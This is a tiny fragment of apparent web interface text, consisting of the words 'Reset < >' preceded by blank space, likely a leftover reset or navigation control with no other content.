                                                                        Reset < >